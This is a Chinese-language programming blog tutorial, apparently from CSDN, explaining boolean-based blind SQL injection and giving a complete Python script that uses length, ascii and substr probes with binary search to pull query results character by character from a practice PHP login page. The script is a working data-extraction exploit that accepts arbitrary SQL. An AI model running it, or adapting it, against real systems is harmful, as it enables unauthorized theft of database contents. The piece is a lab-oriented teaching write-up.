Python 安全开发 布尔盲注脚本

已于 2022-02-14 11:15:50 修改
阅读量1.1k 收藏 11
点赞数 2
分类专栏: Python学习 文章标签: python 安全 开发语言
于 2021-12-03 08:39:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/121672138
版权

这里写目录标题

0x00 布尔盲注原理

布尔盲注应用于 页面只有响应为真,和响应为假的两种情况,无其他数据回显。

用到的函数有

length(str) 返回str字符串的长度
ascii(str) 返回str字符串的ascii编码
substr(str,start,len) 返回str字符串从start位开始len长度的字符串

流程

length($sql_exp)> $x 依次判断出 查询出的长度

ascii(substr(($sql_exp),$x,1))>$mid 依次判断出要查询的每位的ascii值

0x01脚本编写

以开普勒php开源靶场为例

  • 下载地址

      https://github.com/admin360bug/PHP

1.1用到的库

requests
有waf 还可以加 time

import requests

1.2判断页面响应

根据页面响应判断
有三种响应
登录成功 关键词 “login ok,success…”
登录失败 关键词 “登录失败”
空页面情况,其他情况

def check_res(res):
    if "success" in res.text:
        return True
    elif "登录失败" in res.text:
        return False
    else:
        return False

1.3判断返回字符串长度

因为不知道执行次数,就用while True循环(死循环),直到 sql语句执行失败的长度的临界值就为要查询的内容的长度eg: length(select version()) > 1 为True … length(select version()) > 5 为False 进入 if not check_res(res) 为真, break 终止while死循环。 得到 length 为 5

def res_length(exp):
    length = -1
    sess = requests.session()
    
    while True:
        sql_exp = "length((%s))>%d" % (exp,length)
        url = "http://www.bachang.com/index.php/Home/Index/SQL_tow?Username=0' or (%s) --+" % (sql_exp)
        res = sess.get(url)
        
        if not check_res(res):
            break
        length += 1
    return length

1.4 获取查询结果

通过二分法提高查询效率
eg: 以版本号 首尾为 5 测试 ascii(5)=53
在这里插入图片描述

先比较(0+127) 如果成立,比较 (63+127) //2 = 95 ,如果不成立 比较 (0+63)//2 = 31 依次类推

def res_result(exp, length):
    result = ""
    sess = requests.session()
    for i  in  range(length):
        left = 0 
        right = 127
        while True:
            mid = (left+right) // 2
            if mid == left:
                result += chr(right)
                break
            sql_exp = "ascii(substr((%s),%d,1))>%d" % (exp, i+1 , mid)
            url = "http://www.bachang.com/index.php/Home/Index/SQL_tow?Username=0' or (%s) --+" % (sql_exp)

            res = sess.get(url)
            if check_res(res):
                left = mid
            else:
                right = mid
    return result

1.5 主函数

写一个 while 循环 一直 可以输入命令

if __name__ == '__main__':
    while True:
        exp = input(">>>请输入SQL语句:")
        length = res_length(exp)
        print("[+]length :%d" % (length))
        result = res_result(exp, length)
        print("[+]result:%s" % (result))

在这里插入图片描述

LuckyCharm~
关注
  • 2
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
布尔盲注python脚本
04-22
.py文件,python脚本实现布尔盲注,输入网址实现自动化注入,信息包括数据库名、表名、字段以及字段中数据。 代码示例靶场:sqli_labs第八关实测可行 注意事项:python3.8,就用了一个requests第三方库,单线程实现...
布尔盲注python3范本模板
01-16
布尔盲注python3范本模板
Python----POC到EXP(requests模块、python脚本实现布尔盲注、延时注入)
Pluto.的博客
12-27 2277
文章目录Python一、编写EXP1. requests模块- 概述- 支持HTTP的方法- requests使用HTTP方法- 参数- 对象对应的方法2. 快速开始3. 相关操作- 定制头部- 超时- GET传参- POST传参- 上传文件- 重定向- cookie4. py脚本实现布尔盲注5. py脚本实现延时注入- sys.argv[ ] Python 一、编写EXP EXP是漏洞利用工具; 基础环境Python3,核心模块requests。 1. requests模块 - 概述 requests
布尔盲注python脚本.zip
12-28
GET和POST型python脚本
Python自动化sql注入:布尔盲注_布尔盲注脚本
最新发布
2401_83739411的博客
04-07 638
学好 Python 不论是就业还是做副业赚钱都不错,但要学会 Python 还是要有一个学习规划。最后大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
开普勒sql注入靶场学习
YouthBelief的博客
10-07 421
mysql安全基线检测命令 检查是否对错误日志进行管理: show variables like ‘log_error’; 检查是否配置二进制日志: show variables like ‘log_bin’; show binary logs; 检查是否配置通用查询日志安全: show variables like ‘%general%’; 检查是否设置禁止MySQL对本地文件存取: show variables like ‘local_infile’; load data local infile ‘s
DVWA(七) - 使用python脚本实现SQL盲注
qq_42785117的博客
09-02 3116
SQL Injection (Blind) sql盲注其实就是sql注入的一种,但是不会根据sql注入的攻击语句返回你想要知道的信息. 盲注分为两种: 布尔盲注以及时间盲注 布尔盲注: 根据你的注入信息返回True和Fales,而返回的True和Fales可能有不同的表现形式,根据不同的网页分析. 时间盲注: 当界面的返回值只有一种true的时候,就需要加入特定的时间函数,通过判断加载web...
Python自动化sql注入:布尔盲注
qq_46145027的博客
04-22 3040
在sql注入时,使用python脚本可以大大提高注入效率,这里演示一下编写python脚本实现布尔盲注的基本流程:演示靶场:sqli-labs。
写一个布尔盲注脚本
weixin_35752645的博客
01-01 460
布尔盲注是一种数据库攻击技术,其目的是通过查询数据库并猜测结果来确定特定信息。布尔盲注的基本原理是,通过提交查询并猜测其真假,从而获取有关数据库中存储的信息的提示。 如果要写一个布尔盲注脚本,你需要以下步骤: 建立与数据库的连接。 编写 SQL 语句,并将其提交给数据库。 处理数据库的响应。如果响应为真,则可以推断出查询的条件是真的;如果响应为假,则可以推断出查询的条件是假的。 根据获得的信息,...
基于python布尔盲注爆破脚本(sqli-libs第八关)
henghengzhao_的博客
10-06 1749
写这个脚本的原因是因为布尔爆破步骤的繁琐,因此写下这个半自动化脚本来提升效率,只需输入url和标志词便可开始爆破
SQL注入——布尔盲注 / Python 脚本爆破
weixin_51559599的博客
11-06 883
phpstudy 的数据库交互太慢,改用 xampp,但 xampp 中无数据库 ‘cms’ ,需要将 phpstudy 中的 cms 数据库导入 xampp 中的数据库(phpstudy 和 xampp 使用的不是同一个数据库)页面中有布尔类型的状态,可以根据布尔类型状态,对数据库中的内容进行判断。登录数据库,创建 cms 数据库,进入 cms 数据库,导入数据库。未返回新闻页面,说明数据库名第一个字母不为 “s”可知,当后面的语句为真时,显示新闻页面。多次判断,最后可知数据库名长度为3。
Bool盲注脚本
Forever_Han13的博客
01-21 625
import requests chars = "qwertyuiopasdfghjklzxcvbnm0123456789}{" url = "http://localhost/sqli-labs-kali2-master/Less-15/" for x in range(0, 10): table_name = "" for y in range(1, 20): for char in chars: payload = {
布尔盲注.py_sql盲注python_
10-03
一个简单的sql注入盲注python脚本,其中语句需要根据环境条件做改变
时间盲注python脚本.zip
12-28
python编写时间盲注自动化的脚本
SQL注入布尔盲注
qq_45557130的博客
10-04 730
sql注入布尔盲注
python布尔盲注脚本
kiihuang的博客
03-28 471
使用python,编写一个可以自动爆破的布尔盲注脚本,根据不同情况调整里面的Content-Length的值。
布尔盲注(ctfhub)
2401_82985722的博客
03-27 702
页面没有报错回显,不知道数据库具体返回值的情况下,对数据库中的内容进行猜解,实行SQL注入。在注入语句后,盲注不是返回查询到的结果,而只是返回查询是否成功。?id=1' and 1=1--+ 真页面true?id=1' and 1=2--+ 假页面false# substr(database(),1,1):表示从数据库的第1个字母开始,显示1个字母,从1开始计数# limit 0,1:表示从第0行开始,显示1行,从0开始计数一、手动注入一般顺序:爆数据库名长度。
SQL注入原理-布尔盲注
T1ngSh0w的博客
09-15 2077
SQL注入原理-布尔盲注+手写python脚本
【SQL注入-布尔盲注
acepanhuan的博客
02-10 1602
学习SQL注入方法之盲注
python实现sql布尔盲注
10-12
SQL布尔盲注是一种利用SQL注入漏洞的攻击方式,通过构造特定的SQL语句,判断某个条件是否成立,从而获取数据库中的信息。Python可以通过requests库发送HTTP请求,用布尔盲注进行攻击。 以下是一个简单的Python代码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值